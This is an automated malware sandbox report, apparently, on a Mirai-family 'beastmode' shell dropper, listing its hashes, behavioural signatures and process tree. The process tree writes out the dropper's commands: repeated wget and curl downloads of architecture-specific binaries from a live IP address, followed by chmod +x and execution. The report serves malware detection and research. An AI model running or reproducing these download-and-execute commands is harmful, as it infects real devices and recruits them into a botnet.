Analysis
-
max time kernel
122s -
max time network
151s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
14-12-2024 03:03
Static task
static1
Behavioral task
behavioral1
Sample
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
-
Size
2KB
-
MD5
624b68623e669355734d1149ffd5d430
-
SHA1
ce07fb83638c8fa2865aa2b3d007c35902f7d96a
-
SHA256
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc
-
SHA512
143e96f06f585f9b6702e9e33497936b5c7b2675a8e0f9aaa3b93289926491ad7e6e204b114a7ca5c09d4bbd44cf2b2b005801ca31338b10d8cbbe9301c4bb23
Malware Config
Extracted
mirai
UNST
Extracted
mirai
UNST
Signatures
-
Mirai family
-
Contacts a large (53107) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 756 chmod 764 chmod 811 chmod 830 chmod 871 chmod 877 chmod 889 chmod 842 chmod 883 chmod 898 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/B3ASTM0DE 757 B3ASTM0DE /tmp/B3ASTM0DE 766 B3ASTM0DE /tmp/B3ASTM0DE 812 B3ASTM0DE /tmp/B3ASTM0DE 831 B3ASTM0DE /tmp/B3ASTM0DE 844 B3ASTM0DE /tmp/B3ASTM0DE 872 B3ASTM0DE /tmp/B3ASTM0DE 878 B3ASTM0DE /tmp/B3ASTM0DE 884 B3ASTM0DE /tmp/B3ASTM0DE 890 B3ASTM0DE /tmp/B3ASTM0DE 899 B3ASTM0DE -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog B3ASTM0DE File opened for modification /dev/misc/watchdog B3ASTM0DE -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp B3ASTM0DE -
Enumerates running processes
Discovers information about currently running processes on the system
-
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-4.dat upx behavioral3/files/fstream-5.dat upx -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp B3ASTM0DE -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/729/fd B3ASTM0DE File opened for reading /proc/725/exe B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe B3ASTM0DE File opened for reading /proc/1/fd B3ASTM0DE File opened for reading /proc/453/exe B3ASTM0DE File opened for reading /proc/723/exe B3ASTM0DE File opened for reading /proc/724/exe B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/703/exe B3ASTM0DE File opened for reading /proc/682/exe B3ASTM0DE File opened for reading /proc/732/exe B3ASTM0DE File opened for reading /proc/847/exe B3ASTM0DE File opened for reading /proc/335/fd B3ASTM0DE File opened for reading /proc/395/fd B3ASTM0DE File opened for reading /proc/681/fd B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/153/fd B3ASTM0DE File opened for reading /proc/679/fd B3ASTM0DE File opened for reading /proc/703/fd B3ASTM0DE File opened for reading /proc/679/exe B3ASTM0DE File opened for reading /proc/386/fd B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/782/exe B3ASTM0DE File opened for reading /proc/359/fd B3ASTM0DE File opened for reading /proc/361/fd B3ASTM0DE File opened for reading /proc/732/fd B3ASTM0DE File opened for reading /proc/676/fd B3ASTM0DE File opened for reading /proc/682/fd B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/676/exe B3ASTM0DE File opened for reading /proc/174/fd B3ASTM0DE File opened for reading /proc/356/fd B3ASTM0DE File opened for reading /proc/717/fd B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/681/exe B3ASTM0DE File opened for reading /proc/808/exe B3ASTM0DE File opened for reading /proc/817/exe B3ASTM0DE File opened for reading /proc/389/fd B3ASTM0DE File opened for reading /proc/453/fd B3ASTM0DE File opened for reading /proc/725/fd B3ASTM0DE File opened for reading /proc/848/exe B3ASTM0DE File opened for reading /proc/718/fd B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/248/fd B3ASTM0DE File opened for reading /proc/358/fd B3ASTM0DE File opened for reading /proc/772/fd B3ASTM0DE File opened for reading /proc/787/exe B3ASTM0DE File opened for reading /proc/717/exe B3ASTM0DE File opened for reading /proc/722/exe B3ASTM0DE -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 763 cat 759 wget 760 curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/b3astmode.arm7 wget File opened for modification /tmp/b3astmode.arm7 curl File opened for modification /tmp/b3astmode.m68k wget File opened for modification /tmp/b3astmode.sh4 curl File opened for modification /tmp/b3astmode.x86 wget File opened for modification /tmp/b3astmode.x86 curl File opened for modification /tmp/b3astmode.arm4 curl File opened for modification /tmp/b3astmode.arm5 wget File opened for modification /tmp/b3astmode.arm6 wget File opened for modification /tmp/b3astmode.arm6 curl File opened for modification /tmp/b3astmode.mpsl wget File opened for modification /tmp/b3astmode.ppc wget File opened for modification /tmp/b3astmode.m68k curl File opened for modification /tmp/b3astmode.sh4 wget File opened for modification /tmp/B3ASTM0DE 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh File opened for modification /tmp/b3astmode.mips wget File opened for modification /tmp/b3astmode.mips curl File opened for modification /tmp/b3astmode.mpsl curl File opened for modification /tmp/b3astmode.arm5 curl File opened for modification /tmp/b3astmode.ppc curl
Processes
-
/tmp/2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh/tmp/2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh1⤵
- Writes file to tmp directory
PID:725 -
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.x862⤵
- Writes file to tmp directory
PID:728
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/catcat b3astmode.x862⤵PID:755
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:759
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:760
-
-
/bin/catcat b3astmode.mips2⤵
- System Network Configuration Discovery
PID:763
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.mips b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:766
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.mpsl2⤵
- Writes file to tmp directory
PID:775
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/catcat b3astmode.mpsl2⤵PID:810
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:812
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.arm42⤵PID:816
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/catcat b3astmode.arm42⤵PID:829
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:831
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.arm52⤵
- Writes file to tmp directory
PID:832
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/catcat b3astmode.arm52⤵PID:841
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:844
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.arm62⤵
- Writes file to tmp directory
PID:847
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/catcat b3astmode.arm62⤵PID:870
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:872
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.arm72⤵
- Writes file to tmp directory
PID:874
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/catcat b3astmode.arm72⤵PID:876
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:878
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.ppc2⤵
- Writes file to tmp directory
PID:880
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/catcat b3astmode.ppc2⤵PID:882
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:884
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.m68k2⤵
- Writes file to tmp directory
PID:886
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/catcat b3astmode.m68k2⤵PID:888
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:890
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.sh42⤵
- Writes file to tmp directory
PID:892
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/catcat b3astmode.sh42⤵PID:897
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.sh4 b3astmode.x862⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:899
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD56fdcdf8e1a1d76e45fa874a20a18b804
SHA18f8253e997ac2997a16e3a189f441d30d9a7675c
SHA256f7596984321fc1661a09c06d7da23513d21ab87ce7d3b2fed655ee1815288057
SHA512d9e44d922034cde7f8504d603326c58d3e3a37e3362384e8c528430421839ffcac379711172da673e734d01e7c26e81ef97b6ebb0d1245f690639622c89834bc
-
Filesize
24KB
MD58e2bc890571386d49be504c19d6ae5f4
SHA1ec10343c39481e9867cab49607feb8351baa17dd
SHA256e5baf9cce449b61fe75c5bc6ceb2c0f82d4849d0827148bd33a6a1fb8f4b98a2
SHA51275b232d0f4c28b33ec01f0c27bd4e73ddb17d007b6531a63266e08f32c6a8fbe1811aa7570c874c298a117edf31c2f2e191b35d628c65eed45ad723c718db4af
-
Filesize
275B
MD58a052866f3090135b18f374ce1049566
SHA1cc858d4367e62558a09416f9521c159ec02ce42f
SHA256efb22cd5a845c646f8c7516e4d0936eca928b961da2d866a75aa4b2626fb6120
SHA5120b8541f9fa9dce7430684e0c788f798667bba45373c66436226a04e32494a3b62520b8289ce49001009e429153aa2c27c8e4cd794c59f6eef65ab0aa818a9d16
-
Filesize
49KB
MD5d585800f95f4f716d9faf633ebaa9433
SHA1ddf0a2bf2db94565ff0195178c35464c461bba26
SHA256ff3b43f66762a8b39fe29e4a99079f6086a9963015140775aa3ac5fe427ec558
SHA512af4c64a694d237e9994abaae75a5444050bbf87726b0d0025bdbcc94ce307b785ff93d79504069b390e51583db7fbc1735d164254bc3822b33154b96f6b94122
-
Filesize
50KB
MD51eb79986e143c1056ba849622066314a
SHA18e3f6732545066ea8437a0fea031ac48d3fb91ac
SHA256584deb400df62226321615bf2e15538cd3483d0effea114df211395f7d4e3e49
SHA51257c1ee3f81f78d767163d1834d061e36bdf3f8fbd359c73522e5e51c8887a92b2a12c65636cdc49e2974246e24bd944030d6d91083776f62e53018dacf850d3e
-
Filesize
22KB
MD5873c6ba01596fdbb9c469fe1e0180243
SHA19236be2f17ba4d7422bf8f579d95c6226d3eaa48
SHA2569959896b86d7dcb455c0f9d61ba74b19a3dc638ad08b51c4038ea5f092846170
SHA512f218dc4f64b089abae03e2c996d016e71021cb353d35c034db147b4b083453085ee74273d119dc6e7440b5ccad2e00acaada435a10910a6af4a92f071a0ed1ee